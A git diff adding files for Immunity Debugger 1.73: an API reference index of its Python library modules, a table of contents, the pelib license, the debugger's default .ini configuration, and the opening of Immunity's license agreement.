+ Libs.debugtypes.Handle Libs.debugtypes.MemoryPage Libs.debugtypes.Module Libs.debugtypes.PEB Libs.debugtypes.Stack Libs.debugtypes.Symbol Libs.debugtypes.Table Libs.graphclass.Draw Libs.graphclass.Graph Libs.graphclass.Line Libs.graphclass.Vertex Libs.graphclass.vcgNode Libs.immlib.Debugger Libs.immlib.DictTypes Libs.immutils.antifloatdict Libs.immvcglib.ParseVCGList Libs.immvcglib.graphTree Libs.libanalyze.BasicBlock Libs.libanalyze.Decode Libs.libanalyze.Function Libs.libanalyze.JMCBasicBlock Libs.libanalyze.JMPBasicBlock Libs.libanalyze.RETBasicBlock Libs.libanalyze.TraceArgs Libs.libanalyze.XREFBasicBlock Libs.libanalyze.opCode Libs.libdatatype.Data Libs.libdatatype.DataTypes Libs.libdatatype.DoubleLinkedList Libs.libdatatype.Pointer Libs.libdatatype.String Libs.libdatatype.Unicode Libs.libevent.CreateProcessEvent Libs.libevent.CreateThreadEvent Libs.libevent.Event Libs.libevent.ExceptionEvent Libs.libevent.ExceptionRecord Libs.libevent.ExitProcessEvent Libs.libevent.ExitThreadEvent Libs.libevent.LoadDLLEvent Libs.libevent.OutputDebugEvent Libs.libevent.RIPEvent Libs.libevent.UnloadDLLEvent Libs.libheap.Blocks Libs.libheap.Bucket Libs.libheap.LFHeap Libs.libheap.LocalData Libs.libheap.LocalSegmentInfo Libs.libheap.PHeap Libs.libheap.PHeapLookaside Libs.libheap.PLook Libs.libheap.SearchHeap Libs.libheap.Segment Libs.libheap.SubSegment Libs.libheap.UserData Libs.libheap.UserMemoryCache Libs.libheap.VistaPHeap Libs.libheap.win32heapchunk Libs.libheap.win32vistaheapchunk Libs.libhook.AccessViolationHook Libs.libhook.AllExceptHook Libs.libhook.BpHook Libs.libhook.CreateProcessHook Libs.libhook.CreateThreadHook Libs.libhook.ExitProcessHook Libs.libhook.ExitThreadHook Libs.libhook.FastLogHook Libs.libhook.Hook Libs.libhook.LoadDLLHook Libs.libhook.LogBpHook Libs.libhook.PostAnalysisHook Libs.libhook.PreBpHook Libs.libhook.RunUntilAV Libs.libhook.STDCALLFastLogHook Libs.libhook.UnloadDLLHook Libs.librecognition.FunctionRecognition Libs.librecognition.MultiCSVIterator Libs.pelib.Directory Libs.pelib.IMGOPThdr Libs.pelib.IMGhdr Libs.pelib.ImageExportDirectory Libs.pelib.ImageImportByName Libs.pelib.ImportDescriptor Libs.pelib.MZ Libs.pelib.PE Libs.pelib.PEError Libs.pelib.PElib Libs.pelib.Section All Functions
+ Libs.immutils.IsInt Libs.immutils.__MOSDEFimport__ Libs.immutils.b Libs.immutils.big2int Libs.immutils.big_order Libs.immutils.big_short Libs.immutils.binary_from_string Libs.immutils.binary_string_bits Libs.immutils.binary_string_char Libs.immutils.binary_string_int Libs.immutils.binary_string_int16 Libs.immutils.binary_string_int32 Libs.immutils.binary_string_int64 Libs.immutils.binary_string_int8 Libs.immutils.binary_string_short Libs.immutils.bits Libs.immutils.byteswap_16 Libs.immutils.byteswap_32 Libs.immutils.byteswap_64 Libs.immutils.byteswap_bits Libs.immutils.c_array Libs.immutils.check_bits_consistancy Libs.immutils.check_string_len Libs.immutils.dInt Libs.immutils.decimal2binary Libs.immutils.dummywrite Libs.immutils.fmt_bits Libs.immutils.halfword2bstr Libs.immutils.halfword2istr Libs.immutils.hasbadchar Libs.immutils.hexdump Libs.immutils.hexprint Libs.immutils.int2list32 Libs.immutils.int2list_bits Libs.immutils.int2str16 Libs.immutils.int2str16_swapped Libs.immutils.int2str32 Libs.immutils.int2str32_swapped Libs.immutils.int2str_bits Libs.immutils.int2uns Libs.immutils.intel_order Libs.immutils.intel_short Libs.immutils.intel_str2int Libs.immutils.istr2halfword Libs.immutils.istr2int Libs.immutils.nstr2halfword Libs.immutils.prettyhexprint Libs.immutils.prettyprint Libs.immutils.print_binary Libs.immutils.shellcode_dump Libs.immutils.short2bigstr Libs.immutils.signedshort Libs.immutils.sint16 Libs.immutils.sint16fmt Libs.immutils.sint32 Libs.immutils.sint32fmt Libs.immutils.sint64 Libs.immutils.sint64fmt Libs.immutils.sint_bits Libs.immutils.sint_is_signed Libs.immutils.sintfmt_bits Libs.immutils.split_int32 Libs.immutils.split_int_bits Libs.immutils.str2bigendian Libs.immutils.str2int16 Libs.immutils.str2int16_swapped Libs.immutils.str2int32 Libs.immutils.str2int32_swapped Libs.immutils.str2int64 Libs.immutils.str2int64_swapped Libs.immutils.str2int_bits Libs.immutils.str2int_bits_swapped Libs.immutils.str2littleendian Libs.immutils.uint16 Libs.immutils.uint16fmt Libs.immutils.uint32 Libs.immutils.uint32fmt Libs.immutils.uint64 Libs.immutils.uint64fmt Libs.immutils.uint8 Libs.immutils.uint8fmt Libs.immutils.uint_bits Libs.immutils.uintfmt_bits Libs.immutils.warnmsg Libs.immvcglib.addEndPointToEdge Libs.immvcglib.adjustStartCoords Libs.immvcglib.applyDummyPathsH2North Libs.immvcglib.applyDummyPathsH2North2 Libs.immvcglib.applyDummyPathsH2South Libs.immvcglib.applyDummyPathsH2SouthTrue Libs.immvcglib.checkForPlacedVertex Libs.immvcglib.checkForPlacedVertex2 Libs.immvcglib.checkPlanarity Libs.immvcglib.createAdjacencyList Libs.immvcglib.createVertexList Libs.immvcglib.defineVertexRelation Libs.immvcglib.drawEdges Libs.immvcglib.drawVertices Libs.immvcglib.finalAttemptToPlace Libs.immvcglib.firstAttemptToPlace Libs.immvcglib.generateGraph Libs.immvcglib.generateGraphFromBuf Libs.immvcglib.generateVCG Libs.immvcglib.pathFinder Libs.immvcglib.saveVCG Libs.immvcglib.searchForDummyPathsH2North Libs.immvcglib.searchForDummyPathsH2South Libs.immvcglib.searchForDummyPathsW Libs.immvcglib.testVCGParse Libs.internals.addGenHook Libs.internals.hookmain Libs.internals.hookmaintimeout Libs.pelib.hexdump Libs.pelib.readStringFromFile Libs.pelib.usage All Variables
+ Libs.debugtypes.MemoryProtection Libs.graphclass.ImmDrawColors Libs.immlib.BpFlags Libs.immlib.BpKeys Libs.immlib.BpMemFlags Libs.immlib.COUNT Libs.immlib.C_BAD Libs.immlib.C_CAL Libs.immlib.C_CMD Libs.immlib.C_FLG Libs.immlib.C_FLT Libs.immlib.C_JMC Libs.immlib.C_JMP Libs.immlib.C_MMX Libs.immlib.C_NOW Libs.immlib.C_POP Libs.immlib.C_PRI Libs.immlib.C_PSH Libs.immlib.C_REP Libs.immlib.C_RET Libs.immlib.C_RTF Libs.immlib.C_SSE Libs.immlib.C_TYPEMASK Libs.immlib.DECR_3DNOW Libs.immlib.DECR_BYTE Libs.immlib.DECR_DWORD Libs.immlib.DECR_FLOAT10 Libs.immlib.DECR_ISREG Libs.immlib.DECR_QWORD Libs.immlib.DECR_SEG Libs.immlib.DECR_SSE Libs.immlib.DECR_TYPEMASK Libs.immlib.DECR_WORD Libs.immlib.DEC_3DNOW Libs.immlib.DEC_BYTE Libs.immlib.DEC_BYTESW Libs.immlib.DEC_CALLDEST Libs.immlib.DEC_CHECKED Libs.immlib.DEC_COMMAND Libs.immlib.DEC_CONST Libs.immlib.DEC_DWORD Libs.immlib.DEC_FLOAT10 Libs.immlib.DEC_FLOAT4 Libs.immlib.DEC_FLOAT8 Libs.immlib.DEC_FWORD Libs.immlib.DEC_JMPDEST Libs.immlib.DEC_NEXTCODE Libs.immlib.DEC_NEXTDATA Libs.immlib.DEC_PBODY Libs.immlib.DEC_PEND Libs.immlib.DEC_PROC Libs.immlib.DEC_PROCMASK Libs.immlib.DEC_QWORD Libs.immlib.DEC_SIGNED Libs.immlib.DEC_SSE Libs.immlib.DEC_STRING Libs.immlib.DEC_TBYTE Libs.immlib.DEC_TEXT Libs.immlib.DEC_TYPEMASK Libs.immlib.DEC_UNICODE Libs.immlib.DEC_UNKNOWN Libs.immlib.DEC_WORD Libs.immlib.DISASM_ALL Libs.immlib.DISASM_CODE Libs.immlib.DISASM_DATA Libs.immlib.DISASM_FILE Libs.immlib.DISASM_RTRACE Libs.immlib.DISASM_SIZE Libs.immlib.DISASM_TRACE Libs.immlib.DebugerStatus Libs.immlib.EXCEPTION_CODE Libs.immlib.FS_HOOK Libs.immlib.FS_PAUSE Libs.immlib.FS_UNHOOK Libs.immlib.HB_ACCESS Libs.immlib.HB_CODE Libs.immlib.HB_FREE Libs.immlib.HB_IO Libs.immlib.HB_ONESHOT Libs.immlib.HB_STOPAN Libs.immlib.HB_TEMP Libs.immlib.HB_WRITE Libs.immlib.HOOK_REG Libs.immlib.HookTypes Libs.immlib.IgnoreSingleStep Libs.immlib.ImmDrawColors Libs.immlib.ImmFonts Libs.immlib.MemoryProtection Libs.immlib.NM_ANALYSE Libs.immlib.NM_ANYNAME Libs.immlib.NM_ARG Libs.immlib.NM_ASM Libs.immlib.NM_ASSUME Libs.immlib.NM_BREAK Libs.immlib.NM_BREAKEXPL Libs.immlib.NM_BREAKEXPR Libs.immlib.NM_CASE Libs.immlib.NM_COMMENT Libs.immlib.NM_CONST Libs.immlib.NM_DEBUG Libs.immlib.NM_DLLPARMS Libs.immlib.NM_EXPORT Libs.immlib.NM_FINDASM Libs.immlib.NM_FONT Libs.immlib.NM_GOTO Libs.immlib.NM_GOTODUMP Libs.immlib.NM_GOTOSTACK Libs.immlib.NM_HILITE Libs.immlib.NM_IMCALL Libs.immlib.NM_IMPLIB Libs.immlib.NM_IMPNAME Libs.immlib.NM_IMPORT Libs.immlib.NM_INSPECT Libs.immlib.NM_LABEL Libs.immlib.NM_LASTWATCH Libs.immlib.NM_LIBCOMM Libs.immlib.NM_LIBRARY Libs.immlib.NM_MODSEARCH Libs.immlib.NM_NONAME Libs.immlib.NM_PLUGCMD Libs.immlib.NM_REFTXT Libs.immlib.NM_SCHEME Libs.immlib.NM_SOURCE Libs.immlib.NM_STRUCT Libs.immlib.NM_TRPAUSE Libs.immlib.NM_WATCH Libs.immlib.PageFlags Libs.immlib.RST_INDIRECT Libs.immlib.RST_INVALID Libs.immlib.RST_VALUE Libs.immlib.RST_VFIXUP Libs.immlib.Register Libs.immlib.RegisterName Libs.immlib.Registers16BitsOrder Libs.immlib.Registers32BitsOrder Libs.immlib.Registers8BitsOrder Libs.immlib.__VERSION__ Libs.immlib.jmpTypeFlags Libs.immutils.__VERSION__ Libs.immutils.goodchars Libs.immvcglib.PALETTE Libs.immvcglib.__VERSION__ Libs.internals.__VERSION__ Libs.libanalyze.COUNT Libs.libanalyze.C_BAD Libs.libanalyze.C_CAL Libs.libanalyze.C_CMD Libs.libanalyze.C_FLG Libs.libanalyze.C_FLT Libs.libanalyze.C_JMC Libs.libanalyze.C_JMP Libs.libanalyze.C_MMX Libs.libanalyze.C_NOW Libs.libanalyze.C_POP Libs.libanalyze.C_PRI Libs.libanalyze.C_PSH Libs.libanalyze.C_REP Libs.libanalyze.C_RET Libs.libanalyze.C_RTF Libs.libanalyze.C_SSE Libs.libanalyze.C_TYPEMASK Libs.libanalyze.DECR_3DNOW Libs.libanalyze.DECR_BYTE Libs.libanalyze.DECR_DWORD Libs.libanalyze.DECR_FLOAT10 Libs.libanalyze.DECR_ISREG Libs.libanalyze.DECR_QWORD Libs.libanalyze.DECR_SEG Libs.libanalyze.DECR_SSE Libs.libanalyze.DECR_TYPEMASK Libs.libanalyze.DECR_WORD Libs.libanalyze.DEC_3DNOW Libs.libanalyze.DEC_BYTE Libs.libanalyze.DEC_BYTESW Libs.libanalyze.DEC_CALLDEST Libs.libanalyze.DEC_CHECKED Libs.libanalyze.DEC_COMMAND Libs.libanalyze.DEC_CONST Libs.libanalyze.DEC_DWORD Libs.libanalyze.DEC_FLOAT10 Libs.libanalyze.DEC_FLOAT4 Libs.libanalyze.DEC_FLOAT8 Libs.libanalyze.DEC_FWORD Libs.libanalyze.DEC_JMPDEST Libs.libanalyze.DEC_NEXTCODE Libs.libanalyze.DEC_NEXTDATA Libs.libanalyze.DEC_PBODY Libs.libanalyze.DEC_PEND Libs.libanalyze.DEC_PROC Libs.libanalyze.DEC_PROCMASK Libs.libanalyze.DEC_QWORD Libs.libanalyze.DEC_SIGNED Libs.libanalyze.DEC_SSE Libs.libanalyze.DEC_STRING Libs.libanalyze.DEC_TBYTE Libs.libanalyze.DEC_TEXT Libs.libanalyze.DEC_TYPEMASK Libs.libanalyze.DEC_UNICODE Libs.libanalyze.DEC_UNKNOWN Libs.libanalyze.DEC_WORD Libs.libanalyze.DISASM_ALL Libs.libanalyze.DISASM_CODE Libs.libanalyze.DISASM_DATA Libs.libanalyze.DISASM_FILE Libs.libanalyze.DISASM_RTRACE Libs.libanalyze.DISASM_SIZE Libs.libanalyze.DISASM_TRACE Libs.libanalyze.RST_INDIRECT Libs.libanalyze.RST_INVALID Libs.libanalyze.RST_VALUE Libs.libanalyze.RST_VFIXUP Libs.libanalyze.RegisterName Libs.libanalyze.Registers16BitsOrder Libs.libanalyze.Registers32BitsOrder Libs.libanalyze.Registers8BitsOrder Libs.libanalyze.__VERSION__ Libs.libdatatype.DATA_PTR Libs.libdatatype.DIACRITICAL Libs.libdatatype.DOUBLEL Libs.libdatatype.DWORD Libs.libdatatype.FUNCTION_PTR Libs.libdatatype.INT Libs.libdatatype.MEM Libs.libdatatype.MEM_ADDR Libs.libdatatype.PLAINASCII Libs.libdatatype.POINTER Libs.libdatatype.PTR Libs.libdatatype.RAREASCII Libs.libdatatype.STACK_PTR Libs.libdatatype.STRING Libs.libdatatype.UNICODE Libs.libdatatype.__VERSION__ Libs.libdatatype.ctable Libs.libevent.EXCEPTION_CODE Libs.libevent.__VERSION__ Libs.libheap.CHUNK_ANALIZE Libs.libheap.HEAP_MAX_FREELIST Libs.libheap.SHOWCHUNK_FULL Libs.libheap.__VERSION__ Libs.libhook.FS_HOOK Libs.libhook.FS_PAUSE Libs.libhook.FS_UNHOOK Libs.libhook.HOOK_REG Libs.libhook.HookTypes Libs.libhook.__VERSION__ Libs.librecognition.COUNT Libs.librecognition.C_BAD Libs.librecognition.C_CAL Libs.librecognition.C_CMD Libs.librecognition.C_FLG Libs.librecognition.C_FLT Libs.librecognition.C_JMC Libs.librecognition.C_JMP Libs.librecognition.C_MMX Libs.librecognition.C_NOW Libs.librecognition.C_POP Libs.librecognition.C_PRI Libs.librecognition.C_PSH Libs.librecognition.C_REP Libs.librecognition.C_RET Libs.librecognition.C_RTF Libs.librecognition.C_SSE Libs.librecognition.C_TYPEMASK Libs.librecognition.DATA_PTR Libs.librecognition.DECR_3DNOW Libs.librecognition.DECR_BYTE Libs.librecognition.DECR_DWORD Libs.librecognition.DECR_FLOAT10 Libs.librecognition.DECR_ISREG Libs.librecognition.DECR_QWORD Libs.librecognition.DECR_SEG Libs.librecognition.DECR_SSE Libs.librecognition.DECR_TYPEMASK Libs.librecognition.DECR_WORD Libs.librecognition.DEC_3DNOW Libs.librecognition.DEC_BYTE Libs.librecognition.DEC_BYTESW Libs.librecognition.DEC_CALLDEST Libs.librecognition.DEC_CHECKED Libs.librecognition.DEC_COMMAND Libs.librecognition.DEC_CONST Libs.librecognition.DEC_DWORD Libs.librecognition.DEC_FLOAT10 Libs.librecognition.DEC_FLOAT4 Libs.librecognition.DEC_FLOAT8 Libs.librecognition.DEC_FWORD Libs.librecognition.DEC_JMPDEST Libs.librecognition.DEC_NEXTCODE Libs.librecognition.DEC_NEXTDATA Libs.librecognition.DEC_PBODY Libs.librecognition.DEC_PEND Libs.librecognition.DEC_PROC Libs.librecognition.DEC_PROCMASK Libs.librecognition.DEC_QWORD Libs.librecognition.DEC_SIGNED Libs.librecognition.DEC_SSE Libs.librecognition.DEC_STRING Libs.librecognition.DEC_TBYTE Libs.librecognition.DEC_TEXT Libs.librecognition.DEC_TYPEMASK Libs.librecognition.DEC_UNICODE Libs.librecognition.DEC_UNKNOWN Libs.librecognition.DEC_WORD Libs.librecognition.DIACRITICAL Libs.librecognition.DISASM_ALL Libs.librecognition.DISASM_CODE Libs.librecognition.DISASM_DATA Libs.librecognition.DISASM_FILE Libs.librecognition.DISASM_RTRACE Libs.librecognition.DISASM_SIZE Libs.librecognition.DISASM_TRACE Libs.librecognition.DOUBLEL Libs.librecognition.DWORD Libs.librecognition.FUNCTION_PTR Libs.librecognition.INT Libs.librecognition.MEM Libs.librecognition.MEM_ADDR Libs.librecognition.PLAINASCII Libs.librecognition.POINTER Libs.librecognition.PTR Libs.librecognition.RAREASCII Libs.librecognition.RST_INDIRECT Libs.librecognition.RST_INVALID Libs.librecognition.RST_VALUE Libs.librecognition.RST_VFIXUP Libs.librecognition.RegisterName Libs.librecognition.Registers16BitsOrder Libs.librecognition.Registers32BitsOrder Libs.librecognition.Registers8BitsOrder Libs.librecognition.STACK_PTR Libs.librecognition.STRING Libs.librecognition.UNICODE Libs.librecognition.__VERSION__ Libs.librecognition.ctable Libs.pelib.IMAGE_NUMBEROF_DIRECTORY_ENTRIES Libs.pelib.IMAGE_ORDINAL_FLAG Libs.pelib.IMAGE_SIZEOF_FILE_HEADER Libs.pelib.MZ_MAGIC Libs.pelib.PE_MAGIC Libs.pelib.__VERSION__ [hide private ]
+
+
+
+
diff --git a/1.73/Documentation/Ref/toc.html b/1.73/Documentation/Ref/toc.html
new file mode 100755
index 0000000..ca3ea36
--- /dev/null
+++ b/1.73/Documentation/Ref/toc.html
@@ -0,0 +1,45 @@
+
+
+
+
+ Table of Contents
+ Table of Contents
+Everything
+ Modules
+ Libs.debugtypes Libs.graphclass Libs.immlib Libs.immutils Libs.immvcglib Libs.internals Libs.libanalyze Libs.libdatatype Libs.libevent Libs.libheap Libs.libhook Libs.librecognition Libs.pelib [hide private ]
+
+
+
+
diff --git a/1.73/Documentation/pelib_COPYING b/1.73/Documentation/pelib_COPYING
new file mode 100755
index 0000000..70ca49f
--- /dev/null
+++ b/1.73/Documentation/pelib_COPYING
@@ -0,0 +1,27 @@
+Copyright (c) 2004, 2005, 2006 Ero Carrera . All rights reserved.
+
+Redistribution and use in source and binary forms, with or without
+modification, are permitted provided that the following conditions are met:
+
+1. Redistributions of source code must retain the above copyright notice, this
+list of conditions and the following disclaimer.
+
+2. Redistributions in binary form must reproduce the above copyright notice,
+this list of conditions and the following disclaimer in the documentation
+and/or other materials provided with the distribution.
+
+3. The name of the author may not be used to endorse or promote products
+derived from this software without specific prior written permission.
+
+THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR IMPLIED
+WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
+MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO
+EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
+EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT
+OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
+INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
+CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING
+IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY
+OF SUCH DAMAGE.
+
+
diff --git a/1.73/ImmunityDebugger.exe b/1.73/ImmunityDebugger.exe
new file mode 100755
index 0000000..70b0656
Binary files /dev/null and b/1.73/ImmunityDebugger.exe differ
diff --git a/1.73/ImmunityDebugger.ini b/1.73/ImmunityDebugger.ini
new file mode 100755
index 0000000..93cc306
--- /dev/null
+++ b/1.73/ImmunityDebugger.ini
@@ -0,0 +1,312 @@
+2/4/2008 2:43PM#Proxy settings:
+# Use Proxy = 0 : Dont use proxy
+# Use Proxy = 1 : Use proxy
+# Use Proxy = 2 : Use proxy with BASIC auth
+[Proxy]
+Use Proxy=0
+Proxy Ip=0.0.0.0
+Proxy Port=0
+[Settings]
+Check DLL versions=0
+Show toolbar=1
+Status in toolbar=0
+Use hardware breakpoints to step=0
+Restore windows=4271
+Scroll MDI=0
+Horizontal scroll=0
+Topmost window=0
+Index of default font=1
+Index of default colours=0
+Index of default syntax highlighting=0
+Log buffer size index=2
+Run trace buffer size index=1
+Group adjacent commands in profile=1
+Highlighted trace register=-1
+IDEAL disassembling mode=0
+Disassemble in lowercase=0
+Separate arguments with TAB=0
+Extra space between arguments=0
+Show default segments=1
+NEAR jump modifiers=0
+Use short form of string commands=0
+Use RET instead of RETN=0
+Size sensitive mnemonics=1
+SSE size decoding mode=0
+Top of FPU stack=1
+Always show memory size=1
+Decode registers for any IP=0
+Show symbolic addresses=1
+Show local module names=1
+Gray data used as filling=1
+Show jump direction=1
+Show jump path=0
+Show jumpfrom path=0
+Show path if jump is not taken=0
+Underline fixups=1
+Center FOLLOWed command=0
+Show stack frames=1
+Show local names in stack=1
+Extended stack trace=0
+Synchronize source with CPU=0
+Include SFX extractor in code=0
+SFX trace mode=0
+Use real SFX entry from previous run=1
+Ignore SFX exceptions=0
+First pause=2
+Stop on new DLL=0
+Stop on DLL unload=0
+Stop on new thread=0
+Stop on thread end=0
+Stop on debug string=0
+Decode SSE registers=0
+Enable last error=1
+Ignore access violations in KERNEL32=1
+Ignore INT3=0
+Ignore TRAP=0
+Ignore access violations=0
+Step in unknown commands=0
+Ignore division by 0=0
+Ignore illegal instructions=0
+Ignore all FPU exceptions=0
+Warn when frequent breaks=0
+Warn when break not in code=1
+Autoreturn=0
+Save original command in trace=0
+Show traced ESP=0
+Show traced flags=0
+Animate over system DLLs=0
+Trace over string commands=0
+Synchronize CPU and Run trace=0
+Ignore custom exceptions=1
+Smart update=1
+Set high priority=1
+Append arguments=1
+Use ExitProcess=1
+Allow injection to get WinProc=0
+Sort WM_XXX by name=0
+Type of last WinProc breakpoint=0
+Snow-free drawing=0
+Demangle symbolic names=0
+Keep ordinal in name=1
+Only ASCII printable in dump=0
+Allow diacritical symbols=0
+String decoding=0
+Warn if not administrator=1
+Warn when terminating process=1
+Align dialogs=1
+Use font of calling window=0
+Specified dialog font=0
+Number of lines that follow EIP=0
+Restore window positions=1
+Restore width of columns=0
+Highlight sorted column=0
+Compress analysis data=1
+Backup UDD files=1
+Fill rest of command with NOPs=1
+Reference search mode=0
+Global search=1
+Aligned search=0
+Allow error margin=0
+Keep size of hex edit selection=1
+Modify tag of FPU register=1
+Hex inspector limits=1
+MMX display mode=0
+Last selected options card=1
+Last selected appearance card=3
+Ignore case in text search=0
+Letter key in Disassembler=1
+Looseness of code analysis=1
+Decode pascal strings=1
+Guess number of arguments=1
+Accept far calls and returns=0
+Accept direct segment modifications=0
+Decode VxD calls=0
+Accept privileged commands=0
+Accept I/O commands=0
+Accept NOPs=1
+Accept shifts out of range=0
+Accept superfluous prefixes=0
+Accept LOCK prefixes=0
+Accept unaligned stack operations=1
+Accept non-standard command forms=1
+Show ARG and LOCAL in procedures=0
+Save analysis to file=1
+Analyse main module automatically=1
+Analyse code structure=1
+Decode ifs as switches=0
+Save trace to file=0
+Trace contents of registers=1
+Functions preserve registers=0
+Decode tricks=0
+Automatically select register type=0
+Show decoded arguments=1
+Show decoded arguments in stack=1
+Show arguments in call stack=1
+Show induced calls=1
+Label display mode=0
+Label includes module name=0
+Highlight symbolic labels=1
+Highlight RETURNs in stack=1
+Ignore path in user data file=0
+Ignore timestamp in user data file=1
+Ignore CRC in user data file=0
+Default sort mode in Names=1
+Save out-of-module user data=0
+Tabulate columns in log file=0
+Append data to existing log file=0
+Flush gathered data to log file=0
+Skip spaces in source comments=1
+Hide non-existing source files=0
+Tab stops=8
+File graph mode=2
+Show internal handle names=0
+Hide irrelevant handles=0
+Debug Silent=0
+Analyse Second Pass=0
+[Placement]
+Test=320,32,640,480,1
+CPU=15,9,1239,623,3
+CPU subwindows=503,784,477,678,504,715,498,719
+Handles=220,92,647,386,1
+Log data=46,0,1147,533,1
+Executable modules=33,82,1181,407,1
+Memory map=46,0,1153,656,1
+Source=84,124,371,207,1
+PyCommands List=88,88,533,175,1
+Bookmarks=110,110,623,175,1
+SafeSEH Table=22,22,842,595,1
+Patches=273,224,839,175,1
+Heap dump 0x000a0000=65,6,1008,611,1
+References=351,291,798,312,1
+Call stack=702,1,462,265,1
+Breakpoints=154,203,498,182,1
+Heap dump 0x00140000=22,29,737,544,1
+[History]
+View file=
+View text file=
+Object file=
+Import library=
+Log file=log.txt
+Run trace file=rtrace.txt
+API help file=
+Text save file=
+Symbolic data path=.
+UDD path=.
+Plugin path=.
+[Colours]
+Scheme[0]=10,12,18,0,1,2,13,13
+Scheme name[0]=Dave's black
+Scheme[1]=1,5,0,18,7,18,4,12
+Scheme name[1]=Fancy Nico
+Scheme[2]=7,12,7,10,11,7,3,13
+Scheme name[2]=Kostya's blue
+Scheme[3]=7,11,19,0,1,0,0,13
+Scheme name[3]=Dami's black
+Scheme[4]=0,12,8,18,7,8,7,13
+Scheme name[4]=Scheme 4
+Scheme[5]=14,12,7,1,3,7,3,13
+Scheme name[5]=Scheme 5
+Scheme[6]=1,12,3,11,14,2,7,13
+Scheme name[6]=Scheme 6
+Scheme[7]=15,12,7,0,8,11,7,13
+Scheme name[7]=Scheme 7
+
+[Fonts]
+Font[0]=12,8,400,0,0,0,255,2,49,0
+Face name[0]=Terminal
+Font name[0]=OEM fixed font
+Font[1]=9,6,700,0,0,0,255,0,48,1
+Face name[1]=Terminal
+Font name[1]=Terminal 6
+Font[2]=15,8,400,0,0,0,0,2,49,0
+Face name[2]=Fixedsys
+Font name[2]=System fixed font
+Font[3]=14,0,400,0,0,0,1,2,5,0
+Face name[3]=Courier New
+Font name[3]=Courier (UNICODE)
+Font[4]=10,6,400,0,0,0,1,2,5,0
+Face name[4]=Lucida Console
+Font name[4]=Lucida (UNICODE)
+Font[5]=9,6,700,0,0,0,255,0,48,0
+Face name[5]=Terminal
+Font name[5]=Font 5
+Font[6]=15,8,400,0,0,0,0,2,49,0
+Face name[6]=Fixedsys
+Font name[6]=Font 6
+Font[7]=14,0,400,0,0,0,1,2,5,0
+Face name[7]=Courier New
+Font name[7]=Font 7
+[Syntax]
+Commands[1]=10,7,12,12,14,12,12,13,96,7,14,0,0,0
+Operands[1]=1,7,7,7,13,14,10,11,0,0,0,0,0,0
+Scheme name[1]=Dave
+Commands[2]=1,1,1,1,1,1,1,4,109,12,12,0,0,0
+Operands[2]=1,1,2,4,12,2,2,5,0,0,0,0,0,0
+Scheme name[2]=Fancy Nico
+Commands[3]=14,4,124,124,9,110,64,13,111,8,12,0,0,0
+Operands[3]=1,10,4,13,11,13,15,6,0,0,0,0,0,0
+Scheme name[3]=Kostya's xmas tree
+Commands[4]=7,7,2,12,6,12,10,13,96,7,14,0,0,0
+Operands[4]=1,7,7,7,13,7,10,11,0,0,0,0,0,0
+Scheme name[4]=Dami
+Commands[5]=0,0,0,0,0,0,0,0,0,0,0,0,0,0
+Operands[5]=0,0,0,0,0,0,0,0,0,0,0,0,0,0
+Scheme name[5]=No highlighting
+Commands[0]=0,0,0,0,0,0,0,0,0,0,0,0,0,0
+Operands[0]=0,0,0,0,0,0,0,0,0,0,0,0,0,0
+Scheme name[0]=No highlighting
+
+
+
+[Plugin Bookmarks]
+Restore bookmarks window=0
+[Appearance]
+CPU scheme=3
+CPU Disassembler=1,3,0,0,1
+CPU Dump=1,3,1,0,4225,0
+CPU Stack=1,3,0,0
+CPU Info=1,3,0,0
+CPU Registers=1,3,1,0
+Handles=1,0,1,0,0
+Log data=1,0,1,0,0
+Executable modules=1,0,1,0,0
+Memory map=1,0,1,0,0
+Source=1,0,0,0,0
+PyCommands List=1,0,1,0,0
+Bookmarks=1,0,1,0,0
+SafeSEH Table=1,0,1,0,0
+Patches=1,0,1,0,0
+Heap dump 0x000a0000=6,0,1,0,0
+References=1,0,1,0,0
+Call stack=1,0,1,0,0
+Breakpoints=1,0,1,0,0
+Heap dump 0x00140000=1,0,1,0,0
+[Columns]
+CPU Disassembler=54,102,240,1536
+CPU Dump=54,144,54
+CPU Stack=54,60,30,1536
+Handles=54,90,36,54,18,72,1536
+Log data=54,1536
+Executable modules=54,54,54,54,96,1536
+Memory map=54,54,54,54,72,30,48,48,1536
+Source=48,1536
+PyCommands List=210,1536
+Bookmarks=54,54,192,1536
+SafeSEH Table=150,150
+Patches=54,30,48,192,192,1536
+Heap dump 0x000a0000=200,645
+References=54,240,240
+Call stack=54,0,216,168,54,96
+Breakpoints=54,54,150,216,1536
+Heap dump 0x00140000=150,553
+[Arguments]
+Executable[1]=
+Executable[2]=
+Executable[3]=
+Executable[4]=
+Executable[5]=
+Executable[0]=
+[System]
+Options position=218,219
+[Exceptions]
+Custom[0]=E06D7363,E06D7363
diff --git a/1.73/LICENSE.txt b/1.73/LICENSE.txt
new file mode 100755
index 0000000..ab9cc71
--- /dev/null
+++ b/1.73/LICENSE.txt
@@ -0,0 +1,153 @@
+Last Updated: February 11, 2009
+
+IMMUNITY, INC.
+
+SOFTWARE LICENSE AGREEMENT
+
+THIS LICENSE AGREEMENT (with the schedules annexed hereto, the "Agreement") is made as of the day when registered on the download server between "Licensee", the user of the software, whether corporate entity or individual, and Immunity, Inc, "Licensor", a New York State based company with primary offices at 1247 Alton Road, Miami Beach FL, 33139. If the Licensee does not agree to the terms described within this document, the Licensee is not authorized to install, copy, or otherwise use the Software.
+
+W I T N E S S E T H:
+
+WHEREAS, Licensor is in the business, among other things, of licensing the proprietary software more particularly described in Schedule "A" attached hereto and made a part hereof, which, together with the object code, registration key, documentation and other materials are collectively referred to herein as the "Software"; and
+
+WHEREAS, Licensor owns or has the license to all of the intellectual and other proprietary rights (including copyrights and trademarks) associated with the Software; and
+
